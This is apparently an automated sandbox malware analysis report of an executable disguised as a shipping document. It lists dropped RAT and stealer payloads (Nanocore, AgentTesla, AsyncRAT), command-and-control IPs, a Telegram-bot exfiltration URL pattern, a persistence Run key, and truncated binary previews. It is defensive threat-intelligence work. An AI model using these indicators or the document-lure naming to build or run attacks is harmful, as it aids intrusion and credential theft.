http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Consignment Document PL&BL Draft.exe, 00000000.00000002.234335225.0000000003011000.00000004.00000001.sdmp, Isgeprf.exe, 00000004.00000002.263961602.0000000002B9E000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x	Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	Rczgwoxvqzh.exe, 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Fdquqwatjjr.exe, Fdquqwatjjr.exe.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
85.187.154.178	unknown	United States		55293	A2HOSTINGUS	true
172.94.25.202	unknown	United States		9009	M247GB	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	326301
Start date:	03.12.2020
Start time:	09:30:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Consignment Document PL&BL Draft.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@26/14@13/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.3% (good quality ratio 0.2%) Quality average: 36.2% Quality standard deviation: 34.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 356 Number of non-executed functions: 5
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 40.88.32.150, 51.11.168.160, 92.122.144.200, 20.54.26.129, 92.122.213.194, 92.122.213.247, 13.88.21.125, 51.104.139.180, 104.43.139.144 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:31:13	API Interceptor	20x Sleep call for process: Consignment Document PL&BL Draft.exe modified
09:31:20	API Interceptor	937x Sleep call for process: Icda.exe modified
09:31:24	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
09:31:30	Task Scheduler	Run new task: VLC2 path: "C:\Users\user\AppData\Local\Temp\VLC2.exe"
09:31:32	API Interceptor	753x Sleep call for process: Fdquqwatjjr.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
85.187.154.178	Purchase Order.exe	Get hash	malicious	Browse
	SHIPPING DOCUMENT PL&BL DRAFT.EXE	Get hash	malicious	Browse
	Shipping Document PLBL Draft.exe	Get hash	malicious	Browse
	Inquiry-20201130095115.exe	Get hash	malicious	Browse
	2hXlfEl7ClfpfY1.exe	Get hash	malicious	Browse
	Inquiry-20201118105427.exe	Get hash	malicious	Browse
	EMMYDON.exe	Get hash	malicious	Browse
	OUTSTANDING INVOICE_pdf.exe	Get hash	malicious	Browse
	VeiRTphBRH.exe	Get hash	malicious	Browse
	DHL RECEIPT_pdf.exe	Get hash	malicious	Browse
	RFQ-1324455663 API 5L X 60.exe	Get hash	malicious	Browse
	DHL INVOICE_pdf.exe	Get hash	malicious	Browse
	sxs73zrn8P.exe	Get hash	malicious	Browse
	ARCHIVE DOC.exe	Get hash	malicious	Browse
	Consignment Details.exe	Get hash	malicious	Browse
	Original Receipt PL&BL Draft.exe	Get hash	malicious	Browse
	RFQ-DOC-112020.exe	Get hash	malicious	Browse
	Gironex 2 9503 Order XLSX.exe	Get hash	malicious	Browse
	Order 17034 PDF.exe	Get hash	malicious	Browse
	RFQ 29-9-20.exe	Get hash	malicious	Browse
172.94.25.202	Shipping Document PLBL Draft.exe	Get hash	malicious	Browse
172.94.25.202	Inquiry-20201130095115.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
centurygift.myq-see.com	Shipping Document PLBL Draft.exe	Get hash	malicious	Browse	172.94.25.202
	Inquiry-20201130095115.exe	Get hash	malicious	Browse	172.94.25.202
	bGtm3bQKUj.exe	Get hash	malicious	Browse	194.5.98.122
	Inquiry-20201109093216.exe	Get hash	malicious	Browse	198.50.243.167

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
A2HOSTINGUS	Purchase Order.exe	Get hash	malicious	Browse	85.187.154.178
	SHIPPING DOCUMENT PL&BL DRAFT.EXE	Get hash	malicious	Browse	85.187.154.178
	invoice.xls	Get hash	malicious	Browse	70.32.23.26
	invoice.xls	Get hash	malicious	Browse	70.32.23.26
	SecuriteInfo.com.Exploit.Siggen3.3350.20871.xls	Get hash	malicious	Browse	70.32.23.26
	SecuriteInfo.com.Exploit.Siggen3.3382.23842.xls	Get hash	malicious	Browse	70.32.23.26
	SecuriteInfo.com.Exploit.Siggen3.3382.23842.xls	Get hash	malicious	Browse	70.32.23.26
	SecuriteInfo.com.Exploit.Siggen3.2041.29340.xls	Get hash	malicious	Browse	70.32.23.26
	Shipping Document PLBL Draft.exe	Get hash	malicious	Browse	85.187.154.178
	Inquiry-20201130095115.exe	Get hash	malicious	Browse	85.187.154.178
	invoice.xls	Get hash	malicious	Browse	70.32.23.26
	invoice.xls	Get hash	malicious	Browse	70.32.23.26
	2020-11-27-ZLoader-DLL-example-01.dll	Get hash	malicious	Browse	70.32.23.26
	2020-11-27-ZLoader-DLL-example-02.dll	Get hash	malicious	Browse	70.32.23.26
	2020-11-27-ZLoader-DLL-example-03.dll	Get hash	malicious	Browse	70.32.23.26
	invoice.xls	Get hash	malicious	Browse	70.32.23.26
	invoice.xls	Get hash	malicious	Browse	70.32.23.26
	invoice.xls	Get hash	malicious	Browse	70.32.23.26
	https://showmewhatyouhave.com/wp-includes/ID3/ASB/?email=kmcpherson@deloitte.co.nz	Get hash	malicious	Browse	68.66.226.85
	2hXlfEl7ClfpfY1.exe	Get hash	malicious	Browse	85.187.154.178
M247GB	5fc612703f844.dll	Get hash	malicious	Browse	89.44.9.160
	QUOTATION MD20-2097.exe	Get hash	malicious	Browse	89.249.74.213
	Shipping Document PLBL Draft.exe	Get hash	malicious	Browse	172.94.25.202
	Inquiry-20201130095115.exe	Get hash	malicious	Browse	172.94.25.202
	payment_APEK201128.exe	Get hash	malicious	Browse	89.249.74.213
	QUOTE#450009123.exe	Get hash	malicious	Browse	89.249.74.213
	Paymentreportadvice.exe	Get hash	malicious	Browse	89.249.74.213
	PaymentRemittanceInfo.exe	Get hash	malicious	Browse	89.249.74.213
	ORDER-207044.xLs.exe	Get hash	malicious	Browse	37.120.208.36
	SIC - 127476.exe	Get hash	malicious	Browse	89.249.74.213
	Wire tranfer_report.exe	Get hash	malicious	Browse	89.249.74.213
	5fbce6bbc8cc4png.dll	Get hash	malicious	Browse	89.44.9.160
	Horizontal band saw KESMAK - ATMH KSY 1600 x 2500.jar	Get hash	malicious	Browse	37.120.145.150
	Horizontal band saw KESMAK - ATMH KSY 1600 x 2500.jar	Get hash	malicious	Browse	37.120.145.150
	FedEx AWB #2893627763.24.11.20.jar	Get hash	malicious	Browse	193.29.104.194
	FedEx AWB #2893627763.24.11.20.jar	Get hash	malicious	Browse	193.29.104.194
	http://bazaarkonections.com/admin/li.exe	Get hash	malicious	Browse	95.215.225.23
	ORDER #201120A.exe	Get hash	malicious	Browse	37.120.208.36
	ORDER #0649.exe	Get hash	malicious	Browse	37.120.208.36
	ORDER #02676.doc.exe	Get hash	malicious	Browse	37.120.208.37

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Shipping Document PLBL Draft.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Inquiry-20201130095115.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Icda.exe	Shipping Document PLBL Draft.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Icda.exe	Inquiry-20201130095115.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	Shipping Document PLBL Draft.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	Inquiry-20201130095115.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Shipping Document PLBL Draft.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Inquiry-20201130095115.exe	Get hash	malicious	Browse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Shipping Document PLBL Draft.exe	Get hash	malicious	Browse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Inquiry-20201130095115.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\Icda.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	207360
Entropy (8bit):	7.449292674421311
Encrypted:	false
SSDEEP:	3072:QzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIfjVo9EPPKchNdXM3gskyeOA:QLV6Bta6dtJmakIM5QWKagyrA
MD5:	BB21F995740D8BC1549D9CBC32874DD8
SHA1:	8C53B645027362EC97C15735EEB39A12D62C8A74
SHA-256:	9589565F7BEB6DCCFE4F8424455271BBF810182EA94DACBC8C081577E34A51E1
SHA-512:	608E1871476D3534D9C7BC1951CCC4ABBB3056F57D3C64BEB1D13B8A453DE7B113001C70C0A1728A2776538D464893990A88035B2FB34254F24927E4536AE24B
Malicious:	true
Yara Hits:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 94%
Joe Sandbox View:	Filename: Shipping Document PLBL Draft.exe, Detection: malicious, Browse Filename: Inquiry-20201130095115.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................`........... ........@.. ......................................................................8...W.... ...]........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc....]... ...^..................@..@................t.......H...........T............................................................0..Q........o5........o6....-.&......3+..+.... ....3......1..... 2.... ....3.... ............0..E.......s7....-(&s8....-&&s9....,$&s:........s;.............+.....+.....+.....0..........~....o<.....0..........~....o=.....0..........~....o>.....0..........~....o?.....0..........~....o@.....0.............-.&(A...&+...0..$.......~B........-.(...+.-.&+..B...+.~B....0.............-.&(A...&+...0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.2874233355119316
Encrypted:	false
SSDEEP:	12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
MD5:	61CCF53571C9ABA6511D696CB0D32E45
SHA1:	A13A42A20EC14942F52DB20FB16A0A520F8183CE
SHA-256:	3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
SHA-512:	90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Rczgwoxvqzh.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.367899416177239
Encrypted:	false
SSDEEP:	24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
MD5:	7115A3215A4C22EF20AB9AF4160EE8F5
SHA1:	A4CAB34355971C1FBAABECEFA91458C4936F2C24
SHA-256:	A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
SHA-512:	2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Consignment Document PL&BL Draft.exe.log Download File
Process:	C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	5.345637324625647
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
MD5:	6C42AAF2F2FABAD2BAB70543AE48CEDB
SHA1:	8552031F83C078FE1C035191A32BA43261A63DA9
SHA-256:	51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
SHA-512:	014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Isgeprf.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\Isgeprf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.348034597186669
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat92n4M6:ML9E4Ks2wKDE4KhK3VZ9pKhg84j
MD5:	07FC10473CB7F0DEC42EE8079EB0DF28
SHA1:	90FA6D0B604991B3E5E8F6DB041651B10FD4284A
SHA-256:	A42B61DFB4AF366D05CE1815C88E2392C7C4AA9B6B17604234BEB7A7DADA7E4C
SHA-512:	D7240EE88D207E631990907AFA96C8384FB51729A16247BD4BDB96CBA3C4CDB9A68ADCD07819B2242A0F395690AD831B1B547EC91E988CBE39398F472055D56F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VLC2.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\VLC2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.340009400190196
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5:	CC144808DBAF00E03294347EADC8E779
SHA1:	A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256:	3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512:	A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	219648
Entropy (8bit):	6.069728788301543
Encrypted:	false
SSDEEP:	3072:jGW32XuumXzok4CeyFZdUCEpBQxm+uITVLmfOfaXSwN1SQYBy3t7rH:j7oQe0TUrPIhAWppRMd7
MD5:	E8DC83A4ED7657D3211077B7F343FC3C
SHA1:	0AF6CB0CA0D55A2EC6626443B5D91F9C0D0C332C
SHA-256:	C0791632452FD17FDB08B4241AD7B6F5AAF1AF6190861301135EF3631F4B4020
SHA-512:	F37155BE17E744B46CB76F746EC8D02E7D6F0EC8B3D8CAA583081504E15674B9C1BB5E3061B149AEB599325293959704064B3512F156797C1F5046289E41125C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Joe Sandbox View:	Filename: Shipping Document PLBL Draft.exe, Detection: malicious, Browse Filename: Inquiry-20201130095115.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................P..........>o... ........@.. ....................................@..................................n..K.......P............................................................................ ............... ..H............text...DO... ...P.................. ..`.rsrc...P............R..............@..@.reloc...............X..............@..B................ o......H.........................................................................(......(.....s.........s.........s.........s............0..,.........+......,........,........,.+.+.~....o.....0..,.........+......,........,........,.+.+.~....o.....0..,.........+......,........,........,.+.+.~....o.....0..,.........+......,........,........,.+.+.~....o.....0............+......,........,........,.+.+...(....(.......0..(.........+......,........,........,.+.+..(....*.0..,.......

C:\Users\user\AppData\Local\Temp\Icda.exe Download File
Process:	C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	207360
Entropy (8bit):	7.449292674421311
Encrypted:	false
SSDEEP:	3072:QzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIfjVo9EPPKchNdXM3gskyeOA:QLV6Bta6dtJmakIM5QWKagyrA
MD5:	BB21F995740D8BC1549D9CBC32874DD8
SHA1:	8C53B645027362EC97C15735EEB39A12D62C8A74
SHA-256:	9589565F7BEB6DCCFE4F8424455271BBF810182EA94DACBC8C081577E34A51E1
SHA-512:	608E1871476D3534D9C7BC1951CCC4ABBB3056F57D3C64BEB1D13B8A453DE7B113001C70C0A1728A2776538D464893990A88035B2FB34254F24927E4536AE24B
Malicious:	true
Yara Hits:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Joe Security Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 94%
Joe Sandbox View:	Filename: Shipping Document PLBL Draft.exe, Detection: malicious, Browse Filename: Inquiry-20201130095115.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................`........... ........@.. ......................................................................8...W.... ...]........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc....]... ...^..................@..@................t.......H...........T............................................................0..Q........o5........o6....-.&......3+..+.... ....3......1..... 2.... ....3.... ............0..E.......s7....-(&s8....-&&s9....,$&s:........s;.............+.....+.....+.....0..........~....o<.....0..........~....o=.....0..........~....o>.....0..........~....o?.....0..........~....o@.....0.............-.&(A...&+...0..$.......~B........-.(...+.-.&+..B...+.~B....0.............-.&(A...&+...0..

C:\Users\user\AppData\Local\Temp\Isgeprf.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46080
Entropy (8bit):	5.460481307882583
Encrypted:	false
SSDEEP:	768:HuOe1TXQpMlWUlr7e+fmo2qDWL5P0NFUTpYkk8PIvzjbpgX3iQ2/bcGA8+gulCsN:HuOe1TXOw2BLs7Bv3bmXSQk9/Wdjx
MD5:	E2DA4F42475E01F7961EF2FB929DE54E
SHA1:	E57DF765DA7135D578B29E4619CC395A729EB757
SHA-256:	488C59FDDF2DB00DA7FB4D6589183ADC7396EDC4233F23EB950AA7191FE4366E
SHA-512:	08CF988BE2B1D4214812477759BF273E1281D762491D5EB40ED77C95AD701A08FCE0D5A67B7D2163389E0EFA96422DD535D1062ECB345AC6054688E38EB6E2A0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 86%
Joe Sandbox View:	Filename: Shipping Document PLBL Draft.exe, Detection: malicious, Browse Filename: Inquiry-20201130095115.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^............................>.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........Y...l.............................................................V..;...$0.xC.=VD..b......9A../.\.....(.....~............~............~............~............~............~............~............~.....~............~............~............(>......2~.....o?....s..........()...:(...(...:....(+...:....('...:....((...9.....(v...V(....s.... ...o....n~....9....~....o..........~~....(....9....(0...9....(@...Vr.%.p~....(o....#....s...

C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe Download File
Process:	C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	128000
Entropy (8bit):	7.95381804390952
Encrypted:	false
SSDEEP:	3072:DJyVj8p64ZCYke3DIgu2hXNGAAYDqREUJmnlq722EP3mThUP2P:M4pi5e3Mg7XsAXlU8l3tPU
MD5:	01475371C9519A0C8F64B7606A0833E0
SHA1:	58DE8246D2910F00ED1D4DEABC69CF60D8DDCF8B
SHA-256:	97A5CAB2336F3B81F82D7EC85B2F0937CE39D10E512BF0BDADE9248D6D1BC682
SHA-512:	9DB9F3D2F6DB0E1E7154D79B54316A0A54D75BDAB327EC248D23F7EED3DB54BB00C61C003C92E1B1C38D30EEFA6A680CBA73B7CF28DE3C2181BB82B25E40662F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Joe Sandbox View:	Filename: Shipping Document PLBL Draft.exe, Detection: malicious, Browse Filename: Inquiry-20201130095115.exe, Detection: malicious, Browse
